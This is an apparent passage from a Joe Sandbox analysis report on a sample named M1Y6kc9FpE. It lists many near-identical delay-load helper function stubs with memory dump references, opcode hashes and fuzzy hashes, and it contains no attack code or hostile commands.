                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1269201914-0
                                                                                                                                                      • Opcode ID: fd43649fc817319126de4d04323ab6e164fec9d49b21e3b3f983366bc6ddcea3
                                                                                                                                                      • Instruction ID: 3201057de76f7f07d6b59c6e25f5ca07a63ec00d9a2b0b4e4f9420d29f66a723
                                                                                                                                                      • Opcode Fuzzy Hash: fd43649fc817319126de4d04323ab6e164fec9d49b21e3b3f983366bc6ddcea3
                                                                                                                                                      • Instruction Fuzzy Hash: 74B0129926C010BC320851343F02E3F012CD1C8F10330CB3AF404C1142D4418D4D1131
                                                                                                                                                      Function 00A44949 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A44918
                                                                                                                                                        • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
                                                                                                                                                        • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1269201914-0
                                                                                                                                                      • Opcode ID: 589afe705859a4c81d9de3d1b716b24b3e3f0111829d63240911dc2a148ef6fb
                                                                                                                                                      • Instruction ID: 8b9185966c0285fd03c0e552777bb205210347bbecac90244fcb52ec763223d5
                                                                                                                                                      • Opcode Fuzzy Hash: 589afe705859a4c81d9de3d1b716b24b3e3f0111829d63240911dc2a148ef6fb
                                                                                                                                                      • Instruction Fuzzy Hash: 66B0129D26C210FC334451343E12E3F012CD1C8F10330CB2AF004C1542D8408C841131
                                                                                                                                                      Function 00A44953 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A44918
                                                                                                                                                        • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
                                                                                                                                                        • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1269201914-0
                                                                                                                                                      • Opcode ID: e8d805d5cafa420ac98cd3e041c5c9d15caef0bf2cdea93746f0e5f3a82fa06f
                                                                                                                                                      • Instruction ID: 20ebcfb482968016f1b1716aea2b4634c4fd9ad6f98126623d2b2d0103f0dd77
                                                                                                                                                      • Opcode Fuzzy Hash: e8d805d5cafa420ac98cd3e041c5c9d15caef0bf2cdea93746f0e5f3a82fa06f
                                                                                                                                                      • Instruction Fuzzy Hash: F5B0129D26C210BC320451343F12E3F012CD1C8F10330CB2AF404C1142D8418E451131
                                                                                                                                                      Function 00A4495D Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A44918
                                                                                                                                                        • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
                                                                                                                                                        • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1269201914-0
                                                                                                                                                      • Opcode ID: db8dcdc8434ff8c758c492623aea965db46a44719e896e66f0942356eea0a4a1
                                                                                                                                                      • Instruction ID: 514879f0ec317471c1fc9236bac8a5411521ca5df4ffb99bde649622e10b788d
                                                                                                                                                      • Opcode Fuzzy Hash: db8dcdc8434ff8c758c492623aea965db46a44719e896e66f0942356eea0a4a1
                                                                                                                                                      • Instruction Fuzzy Hash: ECB0129D26C110BC320451343E12E3F022CE1C8F10330CB1AF004C1142D8408C441231
                                                                                                                                                      Function 00A44A07 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A44918
                                                                                                                                                        • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
                                                                                                                                                        • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1269201914-0
                                                                                                                                                      • Opcode ID: 334737f9f34efe70fe301af6c4cb1f876ee9c9ff5ac9ff7d35229a4eac7ca41a
                                                                                                                                                      • Instruction ID: 75869cf5a54001dfc9515b26315a3dcef555fcbee1b6d4500a4d4f1ae6a348dd
                                                                                                                                                      • Opcode Fuzzy Hash: 334737f9f34efe70fe301af6c4cb1f876ee9c9ff5ac9ff7d35229a4eac7ca41a
                                                                                                                                                      • Instruction Fuzzy Hash: CAB0129926C110BC320451343E03E3F012CD1C9F10330CF1AF404C5042D4408C441131
                                                                                                                                                      Function 00A44B8A Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A44B3B
                                                                                                                                                        • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
                                                                                                                                                        • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1269201914-0
                                                                                                                                                      • Opcode ID: c986b53adf7e4b71d4c9d1d6f4ef3a01bbdfcb12a9aa8a8a86ef754faf1cca0c
                                                                                                                                                      • Instruction ID: 07c07083713b904c2a9f73b5affefe76a3e9c63bc406d2f324dd1f0338bbe477
                                                                                                                                                      • Opcode Fuzzy Hash: c986b53adf7e4b71d4c9d1d6f4ef3a01bbdfcb12a9aa8a8a86ef754faf1cca0c
                                                                                                                                                      • Instruction Fuzzy Hash: 99B0029926D311FD714451595E67F7F116DD5C9F15331D62AF405C5185D8405C4A1131
                                                                                                                                                      Function 00A44B62 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A44B3B
                                                                                                                                                        • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
                                                                                                                                                        • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1269201914-0
                                                                                                                                                      • Opcode ID: 12011dfee19fb137e07a05ab6dd0f8e2a839181c4c1ebd58732e0c935de70ca9
                                                                                                                                                      • Instruction ID: 2851854baed083c083f77b933ab4dc693230661050962689876efbf6c87898b4
                                                                                                                                                      • Opcode Fuzzy Hash: 12011dfee19fb137e07a05ab6dd0f8e2a839181c4c1ebd58732e0c935de70ca9
                                                                                                                                                      • Instruction Fuzzy Hash: 99B0129926C110BC310451199F03F3F022CD1C8F11330D71AF004C1085D8404C4B0031
                                                                                                                                                      Function 00A44B58 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A44B3B
                                                                                                                                                        • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
                                                                                                                                                        • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1269201914-0
                                                                                                                                                      • Opcode ID: ce7dd99c072d8c1a64a9b0c5fe2ddcfd99212c8611b5c3c4015d50ac9c330873
                                                                                                                                                      • Instruction ID: 4dcf9da46b4f1b18379ccc1989910e90f8d18b73ca67190d6ca169594a1a9db3
                                                                                                                                                      • Opcode Fuzzy Hash: ce7dd99c072d8c1a64a9b0c5fe2ddcfd99212c8611b5c3c4015d50ac9c330873
                                                                                                                                                      • Instruction Fuzzy Hash: DFB0129926C210BC320451199E03F3F022CD1C8F11330D72AF004C10C5D8404C8E0031
                                                                                                                                                      Function 00A44CAD Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A44C90
                                                                                                                                                        • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
                                                                                                                                                        • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1269201914-0
                                                                                                                                                      • Opcode ID: 595c0555d879d553283be33bc20f3e41f2b54fd92fcd57078dfa5905f5dba9bb
                                                                                                                                                      • Instruction ID: 55cbfbe1a4176ad3612bc01158a7db6514897b1f3bcea3cd8a58bab54d11b353
                                                                                                                                                      • Opcode Fuzzy Hash: 595c0555d879d553283be33bc20f3e41f2b54fd92fcd57078dfa5905f5dba9bb
                                                                                                                                                      • Instruction Fuzzy Hash: B3B0129926D000FC314451241F02E3F012CD1C8F12331C62AF004C1041D4400C4A0031
                                                                                                                                                      Function 00A44CB7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A44C90
                                                                                                                                                        • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
                                                                                                                                                        • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1269201914-0
                                                                                                                                                      • Opcode ID: fdb7e3c00a85bb1ea55b92528f578261ca13cf375c29296c5fcb5df657dca979
                                                                                                                                                      • Instruction ID: 0a2c6f5605c0191ecf08fcea428e9831a18ad0ab397380d29bc0634fdb22224b
                                                                                                                                                      • Opcode Fuzzy Hash: fdb7e3c00a85bb1ea55b92528f578261ca13cf375c29296c5fcb5df657dca979
                                                                                                                                                      • Instruction Fuzzy Hash: 97B0129926D001FC314451241E02F3E012CF1C8F12331C62AF004C1441D4400C490031
                                                                                                                                                      Function 00A44C99 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A44C90
                                                                                                                                                        • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
                                                                                                                                                        • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1269201914-0
                                                                                                                                                      • Opcode ID: cb2f5c852257f91aecc28c10347ad395dc35ce58466f934926ffb882098ad4c7
                                                                                                                                                      • Instruction ID: 33d50e4d7b7d964280a28b83e472413acc0cf54072caf3c51f89e766d5d0dcd8
                                                                                                                                                      • Opcode Fuzzy Hash: cb2f5c852257f91aecc28c10347ad395dc35ce58466f934926ffb882098ad4c7
                                                                                                                                                      • Instruction Fuzzy Hash: 01B0129926D100FC314451341E02E3F012CD1C8F12331C62AF404C1041D4400C490431
                                                                                                                                                      Function 00A44C7E Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A44C90
                                                                                                                                                        • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
                                                                                                                                                        • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1269201914-0
                                                                                                                                                      • Opcode ID: f9234707e0e56af36b8d77f5eb5ac1128958b22f8e42eb34266e438caf5888c7
                                                                                                                                                      • Instruction ID: 59d5046564f81aeae3499aab8fe430a0daa76465ee59098fa5c14639f52ba7ee
                                                                                                                                                      • Opcode Fuzzy Hash: f9234707e0e56af36b8d77f5eb5ac1128958b22f8e42eb34266e438caf5888c7
                                                                                                                                                      • Instruction Fuzzy Hash: 1EB0129D2AD000FC310411141F02D3F012CD9D4F12332C71AF000C004294400C460031
                                                                                                                                                      Function 00A44D22 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A44CF1
                                                                                                                                                        • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
                                                                                                                                                        • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1269201914-0
                                                                                                                                                      • Opcode ID: b6ca192d7819e35c0b2ecd194112ba02d623cc6208084600c3d11356d509af76
                                                                                                                                                      • Instruction ID: 91c2024f84349f359fbc3e9962d9d873c0d57a7811c74a7d40b33ee5986f7a1c
                                                                                                                                                      • Opcode Fuzzy Hash: b6ca192d7819e35c0b2ecd194112ba02d623cc6208084600c3d11356d509af76
                                                                                                                                                      • Instruction Fuzzy Hash: C4B0129D26D002BC318461141E02E3E022CF1C8F11330C72AF004C1041D4400C490131
                                                                                                                                                      Function 00A44D04 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A44CF1
                                                                                                                                                        • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
                                                                                                                                                        • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1269201914-0
                                                                                                                                                      • Opcode ID: c1316d527783c9c6eab5e7eb22d4b1ff9b3cc2e234ae48a42b9399ab134bd146
                                                                                                                                                      • Instruction ID: 2cacd9aa97f57ac5de2b6beab16dae3c9bd023f026113fe2bcb4a2e26f09d70d
                                                                                                                                                      • Opcode Fuzzy Hash: c1316d527783c9c6eab5e7eb22d4b1ff9b3cc2e234ae48a42b9399ab134bd146
                                                                                                                                                      • Instruction Fuzzy Hash: E9B012DD26D101BC32C461141E02E3E012CE1C8F11330C73AF004C1041D4410C890131
                                                                                                                                                      Function 00A44D18 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
